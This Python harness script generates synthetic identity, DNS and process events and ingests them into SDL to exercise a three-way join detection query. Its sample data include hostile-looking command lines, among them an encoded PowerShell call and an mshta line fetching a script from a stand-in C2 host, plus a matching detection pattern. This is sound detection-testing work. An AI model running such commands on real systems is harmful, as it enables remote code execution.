Files
marcredhat-kql/harness/ingest_join_demo.py
T

221 lines
7.9 KiB
Python

"""Ingest realistic events to SDL to exercise the 3-way join PowerQuery:
identity sign_in failures x suspicious DNS x suspicious process_start
Joined on (user_name) and (host). Events are spread across the last 4 hours.
"""
from __future__ import annotations
import random
import time
from pathlib import Path
import sys
ROOT = Path(__file__).resolve().parent
sys.path.insert(0, str(ROOT))
from sdl_client import add_events, power_query # noqa: E402
NOW_MS = int(time.time() * 1000)
WINDOW_MS = 4 * 60 * 60 * 1000 # 4h
# --- Personas that will land in ALL 3 streams (these will join) --------------
JOIN_TARGETS = [
# (user, host)
("alice.smith", "wks-alice-01"),
("bob.jones", "wks-bob-02"),
("carol.nguyen", "wks-carol-03"),
]
# Users that only fail logins (no DNS/proc match) → in failed-only
NOISE_FAILED_USERS = ["dave.kim", "erin.lopez", "frank.singh"]
# Hosts that have suspicious procs but no DNS hit → noise on proc side
NOISE_PROC_HOSTS = ["srv-build-01", "srv-jenkins-02"]
SUSPECT_DOMAINS = ["c2.example.net", "suspect.example.org", "c2.example.io"]
BENIGN_DOMAINS = ["microsoft.com", "google.com", "github.com"]
SUSPECT_CMDS = [
"powershell.exe -enc SQBFAFgAIA==",
"rundll32.exe shell32.dll,Control_RunDLL",
"mshta.exe http://c2.example.net/x.hta",
]
BENIGN_CMDS = ["explorer.exe", "chrome.exe --no-sandbox", "code.exe"]
def rand_ts() -> str:
"""Random ns-epoch timestamp string within the last 4h."""
ms = NOW_MS - random.randint(0, WINDOW_MS - 1)
return str(ms * 1_000_000)
def evt(ts_ns: str, attrs: dict) -> dict:
return {"ts": ts_ns, "sev": 3, "attrs": attrs, "thread": "T1"}
def gen_failed_signins() -> list[dict]:
out = []
# Users in JOIN_TARGETS get many failures (so they "stand out")
for user, _ in JOIN_TARGETS:
for _ in range(random.randint(8, 15)):
out.append(evt(rand_ts(), {
"dataSource.category": "identity",
"dataSource.vendor": "azure-ad",
"activity_name": "sign_in",
"status": "failure",
"user.name": user,
"src_endpoint.ip": f"203.0.113.{random.randint(2,254)}",
}))
# Noise: failed-only users
for user in NOISE_FAILED_USERS:
for _ in range(random.randint(2, 6)):
out.append(evt(rand_ts(), {
"dataSource.category": "identity",
"dataSource.vendor": "azure-ad",
"activity_name": "sign_in",
"status": "failure",
"user.name": user,
}))
# Some successes (should be filtered out by status='failure')
for user, _ in JOIN_TARGETS:
for _ in range(3):
out.append(evt(rand_ts(), {
"dataSource.category": "identity",
"dataSource.vendor": "azure-ad",
"activity_name": "sign_in",
"status": "success",
"user.name": user,
}))
return out
def gen_dns() -> list[dict]:
out = []
for user, host in JOIN_TARGETS:
# suspicious DNS for these users on their hosts
for _ in range(random.randint(3, 6)):
out.append(evt(rand_ts(), {
"dataSource.category": "network",
"dataSource.vendor": "zeek",
"activity_name": "dns_query",
"user.name": user,
"device.hostname": host,
"dns.question.name": random.choice(SUSPECT_DOMAINS),
}))
# benign DNS noise from same users
for _ in range(5):
out.append(evt(rand_ts(), {
"dataSource.category": "network",
"dataSource.vendor": "zeek",
"activity_name": "dns_query",
"user.name": user,
"device.hostname": host,
"dns.question.name": random.choice(BENIGN_DOMAINS),
}))
# Noise: suspicious DNS for users NOT in JOIN_TARGETS (won't join failed)
for user in ["greg.wu", "helen.park"]:
for _ in range(3):
out.append(evt(rand_ts(), {
"dataSource.category": "network",
"dataSource.vendor": "zeek",
"activity_name": "dns_query",
"user.name": user,
"device.hostname": f"wks-{user.split('.')[0]}-99",
"dns.question.name": random.choice(SUSPECT_DOMAINS),
}))
return out
def gen_process() -> list[dict]:
out = []
for _, host in JOIN_TARGETS:
for _ in range(random.randint(4, 8)):
out.append(evt(rand_ts(), {
"dataSource.category": "process",
"dataSource.vendor": "sentinelone",
"activity_name": "process_start",
"device.hostname": host,
"process.cmd_line": random.choice(SUSPECT_CMDS),
}))
# benign procs on the same hosts
for _ in range(5):
out.append(evt(rand_ts(), {
"dataSource.category": "process",
"dataSource.vendor": "sentinelone",
"activity_name": "process_start",
"device.hostname": host,
"process.cmd_line": random.choice(BENIGN_CMDS),
}))
# Noise: suspicious procs on hosts that don't appear in DNS stream
for host in NOISE_PROC_HOSTS:
for _ in range(3):
out.append(evt(rand_ts(), {
"dataSource.category": "process",
"dataSource.vendor": "sentinelone",
"activity_name": "process_start",
"device.hostname": host,
"process.cmd_line": random.choice(SUSPECT_CMDS),
}))
return out
def chunked(seq: list, n: int):
for i in range(0, len(seq), n):
yield seq[i:i + n]
def main() -> None:
random.seed(42)
events = gen_failed_signins() + gen_dns() + gen_process()
random.shuffle(events)
print(f"Generated {len(events)} events across the last 4h")
sent = 0
for batch in chunked(events, 200):
r = add_events(batch, session_info={
"serverHost": "join-demo",
"logfile": "join-demo.jsonl",
"parser": "json",
})
if r.get("status") != "success":
raise RuntimeError(f"addEvents failed: {r}")
sent += len(batch)
print(f" ingested {sent}/{len(events)}")
time.sleep(0.25)
print(f"Done. {sent} events ingested.")
# Quick verification: run the user's PowerQuery against last 4h
pq = r'''| join
failed = (
dataSource.category = 'identity' AND activity_name = 'sign_in' AND status = 'failure'
| columns user_name = user.name
| group failed_signins = count() by user_name
),
dns = (
dataSource.category = 'network' AND activity_name = 'dns_query'
AND dns.question.name matches "(c2|suspect)\.example\."
| columns user_name = user.name, host = device.hostname, dns_name = dns.question.name
),
proc = (
dataSource.category = 'process' AND activity_name = 'process_start'
AND process.cmd_line matches "(powershell|rundll32|mshta)"
| columns host = device.hostname, cmd_line = process.cmd_line
)
on failed.user_name = dns.user_name, dns.host = proc.host'''
print("\nWaiting 20s for SDL indexing, then running the join...")
time.sleep(20)
res = power_query(pq, start_time="4h")
if isinstance(res, dict):
matches = res.get("matches") or res.get("data") or res.get("results")
print(f"PowerQuery response keys: {list(res.keys())}")
if matches is not None:
print(f"Match count: {len(matches) if hasattr(matches, '__len__') else matches}")
else:
print(res)
else:
print(res)
if __name__ == "__main__":
main()